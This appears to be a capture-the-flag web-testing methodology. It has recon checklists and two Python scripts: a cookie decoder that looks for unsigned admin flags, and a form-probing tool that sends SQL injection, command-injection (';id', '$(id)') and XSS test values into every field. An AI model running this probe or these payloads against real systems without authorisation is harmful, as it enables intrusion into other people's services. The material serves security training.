Methodology

Easy Stuff (first pass, no tooling)

  • Find all login pages
  • Find all upload and content-submission mechanisms (file uploads, comment/contact forms, search boxes)
  • View the source of every page (HTML comments, hidden form fields, JS that names API endpoints)
  • Check the cookies: decode anything that looks base64, and see whether session state (user, role, admin flag) is stored client-side in plaintext or unsigned, because then you can just edit it
  • Look for robots.txt (the Disallow lines are a free list of paths to visit)
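
For the cookie step above, here is an added example (not from the original notes) that classifies each Set-Cookie value as a JWT, base64-wrapped JSON or text, or plaintext, and decodes what it can, so an unsigned role or admin flag stands out. The Set-Cookie headers in SAMPLE_HEADERS are constructed for illustration and the JWT is the well-known jwt.io sample token; nothing here is captured from a real target.

```python
"""Decode and classify cookie values from Set-Cookie headers (CTF first pass)."""
import base64
import binascii
import json
import urllib.parse
from typing import Any, Dict, List, Optional, Tuple


def b64_decode_loose(segment: str) -> Optional[bytes]:
    """Decode standard or URL-safe base64, tolerating stripped padding; None if not base64."""
    if len(segment) < 4:
        return None
    padded = segment + "=" * (-len(segment) % 4)   # many frameworks strip the '=' padding
    for alt in (None, b"-_"):                      # standard alphabet first, then URL-safe
        try:
            return base64.b64decode(padded, altchars=alt, validate=True)
        except (binascii.Error, ValueError):
            continue
    return None


def as_text(raw: bytes) -> Optional[str]:
    """UTF-8 text only if every character is printable; random bytes come back as None."""
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() else None


def inspect_cookie(value: str) -> Dict[str, Any]:
    """Return {'kind': ..., 'decoded': ...} for one cookie value."""
    value = urllib.parse.unquote(value)            # handles id=dGVzdA%3D%3D style encoding
    parts = value.split(".")
    if len(parts) == 3:                            # header.payload.signature => maybe a JWT
        header = b64_decode_loose(parts[0])
        payload = b64_decode_loose(parts[1])
        if header and payload:
            try:
                hdr, body = json.loads(header), json.loads(payload)
            except ValueError:
                hdr = body = None
            if isinstance(hdr, dict) and "alg" in hdr:
                return {"kind": "jwt", "alg": hdr["alg"], "decoded": body}
    raw = b64_decode_loose(value)
    text = as_text(raw) if raw is not None else None
    if text is not None:
        try:
            return {"kind": "base64-json", "decoded": json.loads(text)}
        except ValueError:
            return {"kind": "base64-text", "decoded": text}
    if raw is not None:
        # Decodes, but not to text: a real binary token, or a short ASCII word whose
        # length happens to be a multiple of 4 (e.g. "user"). Worth a second look either way.
        return {"kind": "opaque", "decoded": value}
    return {"kind": "plaintext", "decoded": value}


def parse_set_cookie(header: str) -> Tuple[str, str]:
    """Name and value from one Set-Cookie header; attributes after ';' are ignored."""
    name, _, rest = header.partition("=")
    return name.strip(), rest.split(";", 1)[0].strip()


def audit(headers: List[str]) -> Dict[str, Dict[str, Any]]:
    """Classify every cookie a response set, keyed by cookie name."""
    return {name: inspect_cookie(val) for name, val in map(parse_set_cookie, headers)}


# Constructed sample headers, standing in for what a login response would return.
SAMPLE_HEADERS = [
    "session=eyJ1c2VyIjoiZ3Vlc3QiLCJhZG1pbiI6ZmFsc2V9; Path=/; HttpOnly",
    "role=admin; Path=/",
    "id=dGVzdA%3D%3D; Path=/",
    "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ."
    "SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c; Path=/; Secure",
]

if __name__ == "__main__":
    for name, info in audit(SAMPLE_HEADERS).items():
        print(f"{name}: {info}")
```

The session cookie in the sample decodes to JSON carrying an admin flag with no signature, which is exactly the kind of thing worth flipping to true and resending; the JWT is only as strong as its signature check, so the alg it reports is the next thing to test.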

Attack login pages

  • try basic SQL injection on each one (a lone single quote to provoke an error, then ' OR 1=1-- style bypasses in the username field)
  • try basic command injection on each one (;id, |id, $(id), `id`)

Attack input pages

  • try basic command injection on each one
  • run an XSS scan (at minimum, submit a harmless tag and check whether it comes back unencoded)
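
The two "attack" sections above are one loop: send a baseline request, then each basic payload in each field, and look at what changes. Here is an added example of that loop (not from the original notes). The target URL and field names are assumptions, the payload lists are the minimal first-pass set, and fake_target is a constructed stand-in for a leaky CTF login so the script runs offline; point probe_form at a real form by leaving the default http_post transport in place.

```python
"""First-pass injection probe for a login or input form (CTF triage)."""
import re
import urllib.error
import urllib.parse
import urllib.request
from dataclasses import dataclass
from typing import Callable, Dict, List

# Minimal payload set: enough to provoke an error or a visibly different branch.
SQLI_PAYLOADS = ["'", "' OR '1'='1", "' OR 1=1-- ", "admin'-- "]
CMDI_PAYLOADS = [";id", "|id", "$(id)", "`id`"]
XSS_CANARY = "<zq7x>"          # harmless tag; if it's echoed back verbatim, XSS is on the table

SQL_ERROR_RE = re.compile(
    r"you have an error in your sql syntax|unclosed quotation mark|"
    r"near \".*\": syntax error|ora-\d{5}|pg_query|sqlstate\[", re.I)
CMD_OUTPUT_RE = re.compile(r"uid=\d+\([^)]*\)\s+gid=\d+|root:x:0:0:")


@dataclass
class Response:
    status: int
    body: str

    @property
    def length(self) -> int:
        return len(self.body)


Sender = Callable[[str, Dict[str, str]], Response]


def http_post(url: str, fields: Dict[str, str]) -> Response:
    """Real transport: form-encoded POST; non-2xx replies are returned, not raised."""
    data = urllib.parse.urlencode(fields).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return Response(resp.status, resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as err:
        return Response(err.code, err.read().decode("utf-8", "replace"))


def signals(baseline: Response, probe: Response, payload: str) -> List[str]:
    """Everything that deserves a human look: error leakage, command output, reflection, behaviour change."""
    found = []
    if SQL_ERROR_RE.search(probe.body):
        found.append("sql-error")
    if CMD_OUTPUT_RE.search(probe.body):
        found.append("cmd-output")
    if payload == XSS_CANARY and XSS_CANARY in probe.body:
        found.append("reflected-unencoded")
    if probe.status != baseline.status:
        found.append(f"status:{baseline.status}->{probe.status}")
    # A length change beyond 10% (or 50 bytes) usually means a different page or code path.
    if abs(probe.length - baseline.length) > max(50, baseline.length // 10):
        found.append("length-delta")
    return found


def probe_form(url: str, fields: Dict[str, str], send: Sender = http_post) -> Dict[str, List[str]]:
    """Baseline once, then inject every payload into every field; return {'field|payload': signals}."""
    baseline = send(url, fields)
    hits: Dict[str, List[str]] = {}
    for field in fields:
        for payload in SQLI_PAYLOADS + CMDI_PAYLOADS + [XSS_CANARY]:
            mutated = dict(fields, **{field: payload})
            sig = signals(baseline, send(url, mutated), payload)
            if sig:
                hits[f"{field}|{payload}"] = sig
    return hits


def fake_target(url: str, fields: Dict[str, str]) -> Response:
    """Constructed stand-in for a vulnerable CTF login: leaks SQL errors on a stray quote in
    the username, runs the search field through a shell, and echoes it unencoded."""
    user = fields.get("username", "")
    search = fields.get("search", "")
    if "'" in user:
        return Response(500, "Warning: You have an error in your SQL syntax near ''' at line 1")
    if ";id" in search or "|id" in search:
        return Response(200, "<pre>uid=33(www-data) gid=33(www-data)</pre>")
    if XSS_CANARY in search:
        return Response(200, f"<p>No results for {search}</p>")
    return Response(200, "<html><body>Login failed. Please try again.</body></html>")


if __name__ == "__main__":
    # Assumed target and field names; swap send=fake_target for the default to hit a real form.
    results = probe_form("http://10.0.0.5/login",
                         {"username": "a", "password": "b", "search": "c"}, send=fake_target)
    for key, sig in sorted(results.items()):
        print(f"{key!r:30} -> {', '.join(sig)}")
```

Note that only some command-injection payloads land against the stand-in ($(id) and `id` do nothing there), which is the normal pattern on a real target too: the loop is for finding the one separator the backend passes through, not for confirming all of them.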

Recon

  • nmap -A (version detection, default NSE scripts, OS detection and traceroute in one go)
    • Services on weird ports are common; check every port it reports, not just 80/443
  • Dirbust (dirb, gobuster, ffuf) for a couple of minutes if you have nothing else to go on.
    • Admin panels often pop up
  • Vuln scan with Nikto. If you have a real commercial scanner, run it too, but you probably won't find anything: CTF challenges aren't meant to be solved by a scanner.

Fake it from there.